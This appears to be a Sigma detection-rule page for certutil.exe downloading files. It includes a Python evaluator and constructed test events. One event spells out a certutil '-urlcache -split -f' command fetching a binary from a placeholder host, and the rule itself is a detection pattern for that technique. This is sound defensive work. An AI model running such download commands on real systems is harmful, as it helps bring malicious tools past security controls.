Certutil Downloading Malicious Binaries (RedCanary Threat Detection Report)
Detects attempts to bypass security controls using certutil.exe to download malicious code. Part of the RedCanary 2023 Threat Detection Report.
Sigma rule

```yaml
title: Certutil Downloading Malicious Binaries (RedCanary Threat Detection Report)
id: 5da5a0a0-e610-4d72-9562-339eafdef216
status: experimental
description: |
    Detects attempts to bypass security controls using certutil.exe to download malicious code.
    Part of the RedCanary 2023 Threat Detection Report.
references:
    - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2023/05/10
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\certutil.exe'
        CommandLine|contains:
            - 'urlcache'
            - 'split'
    condition: selection
falsepositives:
    - Unknown
level: low
```
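The rule's selection logic evaluated over constructed process_creation events, as an added example that is not part of the RedCanary rule or the Sigma project; it assumes Sysmon-style `Image` and `CommandLine` fields and Sigma's default case-insensitive string matching, and shows why a rule this broad is shipped at `level: low`.

```python
"""Evaluate the Sigma selection above against process_creation events.
Added example, not code from the RedCanary rule or the Sigma project; events
are dicts with the Sysmon-style Image and CommandLine fields (all constructed).
"""

# Sigma's endswith/contains modifiers match case-insensitively by default,
# so both fields are lower-cased before comparison.
IMAGE_SUFFIX = "\\certutil.exe"
COMMANDLINE_TOKENS = ("urlcache", "split")


def matches_rule(event: dict) -> bool:
    """Return True when the event satisfies `condition: selection`."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    if not image.endswith(IMAGE_SUFFIX):
        return False
    # A list under CommandLine|contains is an OR over the listed values.
    return any(token in cmdline for token in COMMANDLINE_TOKENS)


def triage(events: list) -> list:
    """Return the CommandLine of every event the rule would alert on."""
    return [e["CommandLine"] for e in events if matches_rule(e)]


# Constructed sample events; hosts and file names are placeholders.
SAMPLE_EVENTS = [
    # 1. The behaviour the rule targets: certutil fetching a remote file.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/a.bin a.bin"},
    # 2. Same thing in mixed case, which Sigma still matches.
    {"Image": r"C:\Windows\System32\CertUtil.exe",
     "CommandLine": "CertUtil.exe -URLCache -f http://example.invalid/a.bin a.bin"},
    # 3. A legitimate certificate dump also uses -split, so the rule fires
    #    on it too; that breadth is why the rule is level: low.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -split -dump cert.cer"},
    # 4. Routine certutil use without either token: no alert.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verify cert.cer"},
    # 5. The tokens appear but the image is not certutil: no alert.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo urlcache split"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Events 1 to 3 alert and 4 and 5 do not; event 3 is the kind of benign hit an analyst should expect to tune out locally.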
Related rules
- BITSAdmin Downloading Malicious Binaries (RedCanary Threat Detection Report)
- Possible Raspberry Robin DLL Download Using msiexec (RedCanary Threat Detection Report)
- Suspicious Registry Key Added: LanmanServer Parameters
- Suspicious Registry Key Set (MaxMpxCt)
- Suspicious Registry Modification of MaxMpxCt Parameters